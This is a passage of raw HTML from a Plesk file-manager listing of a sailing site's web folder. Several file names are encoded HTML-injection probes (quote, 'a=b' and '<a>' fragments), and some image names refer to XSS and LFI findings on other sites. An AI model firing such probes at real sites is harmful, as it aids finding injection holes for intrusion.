href="http://nosedivesailing.com/%20a%3db%200fd28a9909b" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=%2520a%253db%25200fd28a9909b" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F%2520a%253db%25200fd28a9909b" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=%2520a%253db%25200fd28a9909b" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_%20a%3db%202d0878db96d" value="%20a%3db%202d0878db96d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=%2520a%253db%25202d0878db96d" onClick="return bin();;lon();">%20a%3db%202d0878db96d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/%20a%3db%202d0878db96d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=%2520a%253db%25202d0878db96d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F%2520a%253db%25202d0878db96d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=%2520a%253db%25202d0878db96d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_%20a%3db%20c23f52e7ba1" value="%20a%3db%20c23f52e7ba1" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=%2520a%253db%2520c23f52e7ba1" onClick="return bin();;lon();">%20a%3db%20c23f52e7ba1</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/%20a%3db%20c23f52e7ba1" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=%2520a%253db%2520c23f52e7ba1" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F%2520a%253db%2520c23f52e7ba1" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=%2520a%253db%2520c23f52e7ba1" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_064a7066601" value="064a7066601" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=064a7066601" onClick="return bin();;lon();">064a7066601</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/064a7066601" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=064a7066601" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F064a7066601" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=064a7066601" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_1-lfi-mod.JPG" value="1-lfi-mod.JPG" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=1-lfi-mod.JPG" onClick=";lon();" onMouseOver="f(event, &#039;image&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_image.gif" width="16" height="16" alt="file_image.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=1-lfi-mod.JPG" onClick=";lon();">1-lfi-mod.JPG</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/1-lfi-mod.JPG" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=1-lfi-mod.JPG" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F1-lfi-mod.JPG" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=1-lfi-mod.JPG" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_1-lfi-mod.JPGfdf080d99066333a3eca3950" value="1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick="return bin();;lon();">1-lfi-mod.JPGfdf080d99066333a3eca3950</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/1-lfi-mod.JPGfdf080d99066333a3eca3950" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=1-lfi-mod.JPGfdf080d99066333a3eca3950" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_1dac1%2522a%253d%2522b%2522064a7066601" value="1dac1%2522a%253d%2522b%2522064a7066601" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=1dac1%252522a%25253d%252522b%252522064a7066601" onClick="return bin();;lon();">1dac1%2522a%253d%2522b%2522064a7066601</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/1dac1%2522a%253d%2522b%2522064a7066601" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=1dac1%252522a%25253d%252522b%252522064a7066601" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F1dac1%252522a%25253d%252522b%252522064a7066601" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=1dac1%252522a%25253d%252522b%252522064a7066601" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_25e31e30568" value="25e31e30568" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=25e31e30568" onClick="return bin();;lon();">25e31e30568</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/25e31e30568" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=25e31e30568" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F25e31e30568" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=25e31e30568" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_2a790%253ca%253e05dd7ec7ca9" value="2a790%253ca%253e05dd7ec7ca9" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=2a790%25253ca%25253e05dd7ec7ca9" onClick="return bin();;lon();">2a790%253ca%253e05dd7ec7ca9</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/2a790%253ca%253e05dd7ec7ca9" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=2a790%25253ca%25253e05dd7ec7ca9" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F2a790%25253ca%25253e05dd7ec7ca9" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=2a790%25253ca%25253e05dd7ec7ca9" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_2ef80%2522%2520a%253db%2520c23f52e7ba1" value="2ef80%2522%2520a%253db%2520c23f52e7ba1" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=2ef80%252522%252520a%25253db%252520c23f52e7ba1" onClick="return bin();;lon();">2ef80%2522%2520a%253db%2520c23f52e7ba1</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/2ef80%2522%2520a%253db%2520c23f52e7ba1" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=2ef80%252522%252520a%25253db%252520c23f52e7ba1" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F2ef80%252522%252520a%25253db%252520c23f52e7ba1" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=2ef80%252522%252520a%25253db%252520c23f52e7ba1" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_302br.net-xss-2.jpg" value="302br.net-xss-2.jpg" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=302br.net-xss-2.jpg" onClick=";lon();" onMouseOver="f(event, &#039;image&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_image.gif" width="16" height="16" alt="file_image.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=302br.net-xss-2.jpg" onClick=";lon();">302br.net-xss-2.jpg</a></td><td class="number">65.0&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/302br.net-xss-2.jpg" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=302br.net-xss-2.jpg" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F302br.net-xss-2.jpg" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=302br.net-xss-2.jpg" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" value="302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick="return bin();;lon();">302br.net-xss-2.jpgfdf080d93392bd957db5b4d5</a></td><td class="number">65.0&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_3e50b%2522%253e%253ca%253e8f0ee00628" value="3e50b%2522%253e%253ca%253e8f0ee00628" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=3e50b%252522%25253e%25253ca%25253e8f0ee00628" onClick="return bin();;lon();">3e50b%2522%253e%253ca%253e8f0ee00628</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/3e50b%2522%253e%253ca%253e8f0ee00628" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=3e50b%252522%25253e%25253ca%25253e8f0ee00628" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F3e50b%252522%25253e%25253ca%25253e8f0ee00628" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=3e50b%252522%25253e%25253ca%25253e8f0ee00628" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_3M.COM-XSS-1.JPG" value="3M.COM-XSS-1.JPG" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=3M.COM-XSS-1.JPG" onClick=";lon();" onMouseOver="f(event, &#039;image&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_image.gif" width="16" height="16" alt="file_image.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=3M.COM-XSS-1.JPG" onClick=";lon();">3M.COM-XSS-1.JPG</a></td><td class="number">279&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/3M.COM-XSS-1.JPG" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" 